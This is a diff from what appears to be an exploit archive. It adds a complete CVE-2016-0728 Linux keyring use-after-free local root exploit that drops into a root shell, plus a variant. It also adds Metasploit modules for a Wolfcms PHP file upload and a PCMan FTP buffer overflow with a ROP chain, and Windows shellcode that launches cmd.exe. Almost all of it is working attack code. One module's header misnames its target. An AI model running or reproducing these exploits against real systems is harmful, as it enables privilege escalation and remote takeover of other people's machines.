COMMIT_CREDS_ADDR (0xffffffff81094250) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550) struct key_type { char * name; - size_t datalen; - void * vet_description; - void * preparse; - void * free_preparse; - void * instantiate; - void * update; - void * match_preparse; - void * match_free; - void * revoke; - void * destroy; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; }; -/* thanks spender - Federico Bento */ -static unsigned long get_kernel_sym(char *name) -{ - FILE *f; - unsigned long addr; - char dummy; - char sname[256]; - int ret; - - f = fopen("/proc/kallsyms", "r"); - if (f == NULL) { - fprintf(stdout, "Unable to obtain symbol listing!\n"); - exit(0); - } - - ret = 0; - while(ret != EOF) { - ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); - if (ret == 0) { - fscanf(f, "%s\n", sname); - continue; - } - if (!strcmp(name, sname)) { - fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); - fclose(f); - return addr; - } - } - - fclose(f); - return 0; -} - void userspace_revoke(void * key) { - commit_creds(prepare_kernel_cred(0)); + commit_creds(prepare_kernel_cred(0)); } int main(int argc, const char *argv[]) { - const char *keyring_name; - size_t i = 0; - unsigned long int l = 0x100000000/2; - key_serial_t serial = -1; - pid_t pid = -1; - struct key_type * my_key_type = NULL; + const char *keyring_name; + size_t i = 0; + unsigned long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + +struct { long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; - struct { - long mtype; - char mtext[STRUCT_LEN]; - } msg = {0x4141414141414141, {0}}; - int msqid; + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } - if (argc != 2) { - puts("usage: ./keys "); - return 1; + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds) COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR; + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); } - printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); - commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); - prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); - if(commit_creds == NULL || prepare_kernel_cred == NULL) { - commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; - prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; - if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) - puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("keyctl"); + return -1; + } } - my_key_type = malloc(sizeof(*my_key_type)); + puts("finished increfing"); + puts("forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("fork"); + return -1; + } - my_key_type->revoke = (void*)userspace_revoke; - memset(msg.mtext, 'A', sizeof(msg.mtext)); - - // key->uid - *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ - //key->perm - *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; - - //key->type - *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; - - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("msgget"); + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("msgsnd"); + exit(1); + } + } + sleep(-1); exit(1); } + } + + puts("finished forking"); + sleep(5); - keyring_name = argv[1]; - - /* Set the new session keyring before we start */ - - serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); - if (serial < 0) { - perror("keyctl"); - return -1; - } - - if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { - perror("keyctl"); - return -1; + /* call userspace_revoke from kernel */ + puts("caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("keyctl_revoke"); } + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); - puts("[+] Increfing..."); - for (i = 1; i < 0xfffffffd; i++) { - if (i == (0xffffffff - l)) { - l = l/2; - sleep(5); - } - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - perror("[-] keyctl"); - return -1; - } - } - sleep(5); - /* here we are going to leak the last references to overflow */ - for (i=0; i<5; ++i) { - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - perror("[-] keyctl"); - return -1; - } - } - - puts("[+] Finished increfing"); - puts("[+] Forking..."); - /* allocate msg struct in the kernel rewriting the freed keyring object */ - for (i=0; i<64; i++) { - pid = fork(); - if (pid == -1) { - perror("[-] fork"); - return -1; - } - - if (pid == 0) { - sleep(2); - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("[-] msgget"); - exit(1); - } - for (i = 0; i < 64; i++) { - if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { - perror("[-] msgsnd"); - exit(1); - } - } - sleep(-1); - exit(1); - } - } - - puts("[+] Finished forking"); - sleep(5); - - /* call userspace_revoke from kernel */ - puts("[+] Caling revoke..."); - if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { - perror("[+] keyctl_revoke"); - } - - printf("uid=%d, euid=%d\n", getuid(), geteuid()); - execl("/bin/sh", "/bin/sh", NULL); - - return 0; + return 0; } \ No newline at end of file diff --git a/platforms/linux/local/40003.c b/platforms/linux/local/40003.c new file mode 100755 index 000000000..bcee599b4 --- /dev/null +++ b/platforms/linux/local/40003.c @@ -0,0 +1,212 @@ +/* +# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings +# Date: 19/1/2016 +# Exploit Author: Perception Point Team +# CVE : CVE-2016-0728 +*/ + +/* CVE-2016-0728 local root exploit + modified by Federico Bento to read kernel symbols from /proc/kallsyms + props to grsecurity/PaX for preventing this in so many ways + + $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall + $ ./cve_2016_072 PP_KEY */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); +_commit_creds commit_creds; +_prepare_kernel_cred prepare_kernel_cred; + +#define STRUCT_LEN (0xb8 - 0x30) +#define COMMIT_CREDS_ADDR (0xffffffff810bb050) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) + + + +struct key_type { + char * name; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; +}; + +/* thanks spender - Federico Bento */ +static unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + fprintf(stdout, "Unable to obtain symbol listing!\n"); + exit(0); + } + + ret = 0; + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); + fclose(f); + return addr; + } + } + + fclose(f); + return 0; +} + +void userspace_revoke(void * key) { + commit_creds(prepare_kernel_cred(0)); +} + +int main(int argc, const char *argv[]) { + const char *keyring_name; + size_t i = 0; + unsigned long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + + struct { + long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; + + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } + + printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); + prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); + if(commit_creds == NULL || prepare_kernel_cred == NULL) { + commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; + if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) + puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + } + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("[+] Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("[-] keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("[-] keyctl"); + return -1; + } + } + + puts("[+] Finished increfing"); + puts("[+] Forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("[-] fork"); + return -1; + } + + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("[-] msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("[-] msgsnd"); + exit(1); + } + } + sleep(-1); + exit(1); + } + } + + puts("[+] Finished forking"); + sleep(5); + + /* call userspace_revoke from kernel */ + puts("[+] Caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("[+] keyctl_revoke"); + } + + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); + + return 0; +} \ No newline at end of file diff --git a/platforms/php/remote/40004.rb b/platforms/php/remote/40004.rb new file mode 100755 index 000000000..c437b6ee3 --- /dev/null +++ b/platforms/php/remote/40004.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in Wolfcms + version 0.8.2. This application has an upload feature that + allows an authenticated user with administrator roles to upload + arbitrary files to the '/public' directory. + }, + 'Author' => [ + 'Narendra Bhati', # Proof of concept + 'Rahmat Nurfauzi' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-6568'], + ['CVE', '2015-6567'], + ['OSVDB','126852'], + ['EDB', '38000'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Wolfcms <= 0.8.2', {}] + ], + 'DisclosureDate' => 'Aug 28 2015', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']), + OptString.new('USER', [true, 'User to login with', '']), + OptString.new('PASS', [true, 'Password to login with', '']), + ], self.class) + end + + def login + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/?/admin/login/login/"), + 'vars_post' => { + "login[username]" => datastore['USER'], + "login[password]" => datastore['PASS'], + "login[redirect]" => "/wolfcms/?/admin" + } + }) + return res + end + + def exploit + + upload_name = rand_text_alpha(5 + rand(5)) + '.php' + + get_cookie = login.get_cookies + cookie = get_cookie.split(";")[3] + + token = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/") + }) + + html = token.body + if html =~ /Files/ + print_status("Login successfuly") + end + csrf_token = html.scan(/ 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + boundary, + 'Cookie' => cookie, + }, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/") + }) + + register_file_for_cleanup(upload_name) + + print_status("#{peer} - Executing shell...") + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "public",upload_name), + }) + + end +end \ No newline at end of file diff --git a/platforms/win32/shellcode/40005.c b/platforms/win32/shellcode/40005.c new file mode 100755 index 000000000..0779cd475 --- /dev/null +++ b/platforms/win32/shellcode/40005.c @@ -0,0 +1,273 @@ +/* + + # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode + # Date : 22-06-2016 + # Author : Roziul Hasan Khan Shifat + # Tested on : Windows 7,10 x86 + +*/ + + +/* + +section .text + global _start +_start: +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;EAX=PEB +mov eax,[eax+0xc] ;EAX=PEB->Ldr +mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList +lodsd ; EAX=ntdll.dll +xchg eax,esi ;EAX=ESI , ESI=EAX +lodsd ; EAX=Third(kernel32) +mov ebx,[eax+0x10] ;PVOID Dllbase (base address) + +;------------------------------- + +mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew +add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header +mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress +add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY) +mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames +add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames +xor ecx,ecx +;----------------------- + +Get_func: +inc ecx ;increment the ordinal +lodsd ;Get name offset +add eax,ebx ;(offset+kernel32.dll base adress)=Get function name +cmp dword [eax],0x50746547 ;GetP +jnz Get_func +cmp dword [eax+0x4],0x41636f72 ;rocA +jnz Get_func +cmp dword [eax+0x8],0x65726464 ;ddre +jnz Get_func + +;--------------------- + +mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals + +add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll + +mov cx,[esi+ecx*2] ;CX=Number of Function +dec ecx +mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions + +add esi,ebx ;ESI=beginning of Address table +mov edx,[esi+ecx*4];EDX=Pointer(offset) +add edx,ebx ;Edx=GetProcAddress + +;----------------------------- +xor esi,esi +mov esi,edx ;backup of GetProcAddress +xor edi,edi +mov edi,ebx +;-------------- + +;finding address of LoadLibraryA() +xor ecx,ecx +push ecx + +push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push ebx ;address of kernel32.dll + +call edx + +add esp,12 +;----------------- +xor ecx,ecx +;finding address of ExitProcess +push 0x42737365 +mov [esp+3],cl +push 0x636f7250 +push 0x74697845 +push esp +push edi +xor edi,edi +mov edi,eax +call esi + +;---------------------------- +add esp,12 +;LoadLibraryA("shell32.dll") +xor ecx,ecx +push ecx +push 0x416c6c64 +mov [esp+3],cl +push 0x2e32336c +push 0x6c656873 + +push esp +xor edx,edx +mov edx,edi ;Edx=LoadLibraryA +mov edi,eax ;edi=ExitProcess +call edx +add esp,11 +;------------------ + +;finding address of ShellExecuteA() +xor ecx,ecx +push 0x42424241 +mov [esp+1],cl + +push 0x65747563 +push 0x6578456c +push 0x6c656853 + +push esp +push eax + +call esi +;------------------- +;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); +add esp,13 +xor ecx,ecx +push 0x41657865 +mov [esp+3],cl +push 0x2e646d63 + +push esp +pop ecx + + +xor edx,edx +inc edx + +push edx +xor edx,edx +push edx +push edx + +push ecx +push edx +push edx + +call eax + +call edi + +*/ + + +/* + +Disassembly of section .text: + +00401000 <_start>: + 401000: 31 c9 xor %ecx,%ecx + 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 401006: 8b 40 0c mov 0xc(%eax),%eax + 401009: 8b 70 14 mov 0x14(%eax),%esi + 40100c: ad lods %ds:(%esi),%eax + 40100d: 96 xchg %eax,%esi + 40100e: ad lods %ds:(%esi),%eax + 40100f: 8b 58 10 mov 0x10(%eax),%ebx + 401012: 8b 53 3c mov 0x3c(%ebx),%edx + 401015: 01 da add %ebx,%edx + 401017: 8b 52 78 mov 0x78(%edx),%edx + 40101a: 01 da add %ebx,%edx + 40101c: 8b 72 20 mov 0x20(%edx),%esi + 40101f: 01 de add %ebx,%esi + 401021: 31 c9 xor %ecx,%ecx + +00401023 : + 401023: 41 inc %ecx + 401024: ad lods %ds:(%esi),%eax + 401025: 01 d8 add %ebx,%eax + 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 40102d: 75 f4 jne 401023 + 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 401036: 75 eb jne 401023 + 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 40103f: 75 e2 jne 401023 + 401041: 8b 72 24 mov 0x24(%edx),%esi + 401044: 01 de add %ebx,%esi + 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx + 40104a: 49 dec %ecx + 40104b: 8b 72 1c mov 0x1c(%edx),%esi + 40104e: 01 de add %ebx,%esi + 401050: 8b 14 8e mov (%esi,%ecx,4),%edx + 401053: 01 da add %ebx,%edx + 401055: 31 f6 xor %esi,%esi + 401057: 89 d6 mov %edx,%esi + 401059: 31 ff xor %edi,%edi + 40105b: 89 df mov %ebx,%edi + 40105d: 31 c9 xor %ecx,%ecx + 40105f: 51 push %ecx + 401060: 68 61 72 79 41 push $0x41797261 + 401065: 68 4c 69 62 72 push $0x7262694c + 40106a: 68 4c 6f 61 64 push $0x64616f4c + 40106f: 54 push %esp + 401070: 53 push %ebx + 401071: ff d2 call *%edx + 401073: 83 c4 0c add $0xc,%esp + 401076: 31 c9 xor %ecx,%ecx + 401078: 68 65 73 73 42 push $0x42737365 + 40107d: 88 4c 24 03 mov %cl,0x3(%esp) + 401081: 68 50 72 6f 63 push $0x636f7250 + 401086: 68 45 78 69 74 push $0x74697845 + 40108b: 54 push %esp + 40108c: 57 push %edi + 40108d: 31 ff xor %edi,%edi + 40108f: 89 c7 mov %eax,%edi + 401091: ff d6 call *%esi + 401093: 83 c4 0c add $0xc,%esp + 401096: 31 c9 xor %ecx,%ecx + 401098: 51 push %ecx + 401099: 68 64 6c 6c 41 push $0x416c6c64 + 40109e: 88 4c 24 03 mov %cl,0x3(%esp) + 4010a2: 68 6c 33 32 2e push $0x2e32336c + 4010a7: 68 73 68 65 6c push $0x6c656873 + 4010ac: 54 push %esp + 4010ad: 31 d2 xor %edx,%edx + 4010af: 89 fa mov %edi,%edx + 4010b1: 89 c7 mov %eax,%edi + 4010b3: ff d2 call *%edx + 4010b5: 83 c4 0b add $0xb,%esp + 4010b8: 31 c9 xor %ecx,%ecx + 4010ba: 68 41 42 42 42 push $0x42424241 + 4010bf: 88 4c 24 01 mov %cl,0x1(%esp) + 4010c3: 68 63 75 74 65 push $0x65747563 + 4010c8: 68 6c 45 78 65 push $0x6578456c + 4010cd: 68 53 68 65 6c push $0x6c656853 + 4010d2: 54 push %esp + 4010d3: 50 push %eax + 4010d4: ff d6 call *%esi + 4010d6: 83 c4 0d add $0xd,%esp + 4010d9: 31 c9 xor %ecx,%ecx + 4010db: 68 65 78 65 41 push $0x41657865 + 4010e0: 88 4c 24 03 mov %cl,0x3(%esp) + 4010e4: 68 63 6d 64 2e push $0x2e646d63 + 4010e9: 54 push %esp + 4010ea: 59 pop %ecx + 4010eb: 31 d2 xor %edx,%edx + 4010ed: 42 inc %edx + 4010ee: 52 push %edx + 4010ef: 31 d2 xor %edx,%edx + 4010f1: 52 push %edx + 4010f2: 52 push %edx + 4010f3: 51 push %ecx + 4010f4: 52 push %edx + 4010f5: 52 push %edx + 4010f6: ff d0 call *%eax + 4010f8: ff d7 call *%edi + +*/ + + +#include +#include +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"; + +main() +{ +printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/win64/remote/39999.rb b/platforms/win64/remote/39999.rb new file mode 100755 index 000000000..a22d3ac16 --- /dev/null +++ b/platforms/win64/remote/39999.rb @@ -0,0 +1,140 @@ +=begin +# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload +# Date: 22-06-2016 +# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z +# Exploit Author: quanyechavshuo +# Contact: quanyechavshuo@gmail.com +# Website: http://xinghuacai.github.io +# Category: ftp remote exploit + +1. Description +this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from + https://www.exploit-db.com/exploits/39662/ + +use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address + +=end + +## + # This module requires Metasploit: http://metasploit.com/download + # Current source: https://github.com/rapid7/metasploit-framework + ## + + require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PCMAN FTP Server Buffer Overflow - ls Command', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in the PUT command of the + PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous + credientials are enabled. + }, + 'Author' => + [ + 'quanyechavshuo' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '39662'], + [ 'OSVDB', 'N/A'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0A\x0D", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'windows 7 x64 chinese', + { + #'Ret' => 0x77636aeb, #dont need ret here in win7 + 'Offset' => 2008 + } + ], + ], + 'DisclosureDate' => 'Aug 07 2015', + 'DefaultTarget' => 0)) + end + + def check + connect_login + disconnect + + if /220 PCMan's FTP Server 2\.0/ === banner + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def create_rop_chain() + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x77032c3b, # POP EAX # RETN [kernel32.dll] + 0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets + 0x73c112d0, # ptr to &VirtualProtect() [IAT OLEACC.dll] + 0x76bb4412, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll] + 0x76408d2a, # XCHG EAX,ESI # RETN [SHLWAPI.dll] + 0x76b607f0, # POP EBP # RETN [msvcrt.dll] + 0x74916f14, # & push esp # ret [RICHED20.dll] + 0x7368b031, # POP EAX # RETN [COMCTL32.dll] + 0xfffffaff, # Value to negate, will become 0x00000201 + 0x756c9a5c, # NEG EAX # RETN [SHELL32.dll] + 0x767088bd, # XCHG EAX,EBX # RETN [RPCRT4.dll] + 0x77031d7b, # POP EAX # RETN [kernel32.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x76cc4402, # NEG EAX # RETN [SHELL32.dll] + 0x76b4ad98, # XCHG EAX,EDX # RETN [SHELL32.dll] + 0x756b1cc1, # POP ECX # RETN [SHELL32.dll] + 0x7647c663, # &Writable location [USP10.dll] + 0x73756cf3, # POP EDI # RETN [COMCTL32.dll] + 0x76cc4404, # RETN (ROP NOP) [USER32.dll] + 0x76b3f5d4, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x7366e16f, # PUSHAD # RETN [COMCTL32.dll] + + ].flatten.pack("V*") + + return rop_gadgets + + end + + + def exploit + connect_login + + print_status('Generating payload...') + sploit = rand_text_alpha(target['Offset']) + + #tmp = sploit + #print_status(tmp) + sploit << create_rop_chain() + #sploit << make_nops(9) 这句产生的nop并非90 + sploit << "\x90"*30 + #sploit << "\x41"*30 + #sploit << "\xcc" + sploit << payload.encoded + + #tmp=sploit + tmp=make_nops(9) + print_status(tmp) + + send_cmd( ["ls", sploit], false ) + disconnect + end + + end +